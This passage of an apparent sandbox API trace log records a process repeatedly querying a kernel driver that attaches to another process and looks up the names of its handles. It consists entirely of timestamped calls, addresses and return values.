(Object=0xfffffa80036d0060) returned 0x18a [0224.088] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.088] ObfDereferenceObject (Object=0xfffffa80037201f0) returned 0x1 [0224.088] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.088] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.088] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.088] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0224.088] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.088] PsAcquireProcessExitSynchronization () returned 0x0 [0224.088] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.088] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0224.088] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.088] PsReleaseProcessExitSynchronization () returned 0x2 [0224.088] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.088] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.088] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x24 [0224.089] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.089] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.089] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.089] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0224.089] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.089] PsAcquireProcessExitSynchronization () returned 0x0 [0224.089] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.089] ObReferenceObjectByHandle (in: Handle=0x168, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0224.089] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.089] PsReleaseProcessExitSynchronization () returned 0x2 [0224.089] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.089] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.089] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x24 [0224.089] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.089] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.089] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.089] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.089] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.089] PsAcquireProcessExitSynchronization () returned 0x0 [0224.089] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.089] ObReferenceObjectByHandle (in: Handle=0x16c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003721490, HandleInformation=0x0) returned 0x0 [0224.089] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.089] PsReleaseProcessExitSynchronization () returned 0x2 [0224.089] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.089] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.089] ObfDereferenceObject (Object=0xfffffa8003721490) returned 0x1 [0224.089] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.089] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.089] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.089] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0224.090] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.090] PsAcquireProcessExitSynchronization () returned 0x0 [0224.090] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.090] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800371d5e0, HandleInformation=0x0) returned 0x0 [0224.090] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.090] PsReleaseProcessExitSynchronization () returned 0x2 [0224.090] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.090] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.090] ObfDereferenceObject (Object=0xfffffa800371d5e0) returned 0x1 [0224.090] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.090] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.090] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.090] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0224.090] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.090] PsAcquireProcessExitSynchronization () returned 0x0 [0224.090] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.090] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003712730, HandleInformation=0x0) returned 0x0 [0224.090] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.090] PsReleaseProcessExitSynchronization () returned 0x2 [0224.090] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.090] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.090] ObfDereferenceObject (Object=0xfffffa8003712730) returned 0x1 [0224.090] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.090] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.090] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.090] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.090] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.091] PsAcquireProcessExitSynchronization () returned 0x0 [0224.091] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.091] ObReferenceObjectByHandle (in: Handle=0x18c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003744410, HandleInformation=0x0) returned 0x0 [0224.091] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.091] PsReleaseProcessExitSynchronization () returned 0x2 [0224.091] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.091] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.091] ObfDereferenceObject (Object=0xfffffa8003744410) returned 0x1 [0224.091] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.091] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.091] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.091] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.091] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.091] PsAcquireProcessExitSynchronization () returned 0x0 [0224.091] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.091] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037375e0, HandleInformation=0x0) returned 0x0 [0224.091] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.091] PsReleaseProcessExitSynchronization () returned 0x2 [0224.091] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.091] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.091] ObfDereferenceObject (Object=0xfffffa80037375e0) returned 0x1 [0224.091] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.091] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.091] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.091] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.091] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.091] PsAcquireProcessExitSynchronization () returned 0x0 [0224.091] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.091] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037705e0, HandleInformation=0x0) returned 0x0 [0224.091] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.092] PsReleaseProcessExitSynchronization () returned 0x2 [0224.092] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.379] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.379] ObfDereferenceObject (Object=0xfffffa80037705e0) returned 0x1 [0224.379] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.379] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.379] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.379] PsAcquireProcessExitSynchronization () returned 0x0 [0224.379] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.379] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037ba730, HandleInformation=0x0) returned 0x0 [0224.379] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.379] PsReleaseProcessExitSynchronization () returned 0x2 [0224.379] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.379] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.379] ObfDereferenceObject (Object=0xfffffa80037ba730) returned 0x1 [0224.379] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.379] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.379] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.380] PsAcquireProcessExitSynchronization () returned 0x0 [0224.380] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.380] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037b6730, HandleInformation=0x0) returned 0x0 [0224.380] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.380] PsReleaseProcessExitSynchronization () returned 0x2 [0224.380] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.380] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.380] ObfDereferenceObject (Object=0xfffffa80037b6730) returned 0x1 [0224.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0224.380] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.380] PsAcquireProcessExitSynchronization () returned 0x0 [0224.380] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.380] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003886670, HandleInformation=0x0) returned 0x0 [0224.380] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.380] PsReleaseProcessExitSynchronization () returned 0x2 [0224.380] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.380] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.380] ObfDereferenceObject (Object=0xfffffa8003886670) returned 0x1 [0224.380] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.380] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.380] PsAcquireProcessExitSynchronization () returned 0x0 [0224.380] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.381] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00103f3f0, HandleInformation=0x0) returned 0x0 [0224.381] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.381] PsReleaseProcessExitSynchronization () returned 0x2 [0224.381] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.381] ObQueryNameString (in: Object=0xfffff8a00103f3f0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.381] ObfDereferenceObject (Object=0xfffff8a00103f3f0) returned 0x1 [0224.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x122, lpOverlapped=0x0) returned 1 [0224.381] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.381] PsAcquireProcessExitSynchronization () returned 0x0 [0224.381] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.381] ObReferenceObjectByHandle (in: Handle=0x2d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038863d0, HandleInformation=0x0) returned 0x0 [0224.381] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.381] PsReleaseProcessExitSynchronization () returned 0x2 [0224.381] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.381] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.381] ObfDereferenceObject (Object=0xfffffa80038863d0) returned 0x1 [0224.381] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x144, lpOverlapped=0x0) returned 1 [0224.381] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.381] PsAcquireProcessExitSynchronization () returned 0x0 [0224.381] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.381] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003886280, HandleInformation=0x0) returned 0x0 [0224.381] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.381] PsReleaseProcessExitSynchronization () returned 0x2 [0224.381] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.381] ObQueryNameString (in: Object=0xfffffa8003886280, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.381] ObfDereferenceObject (Object=0xfffffa8003886280) returned 0x11 [0224.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0224.382] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.382] PsAcquireProcessExitSynchronization () returned 0x0 [0224.382] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.382] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0224.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.382] PsReleaseProcessExitSynchronization () returned 0x2 [0224.382] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.382] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.382] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x5 [0224.382] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, 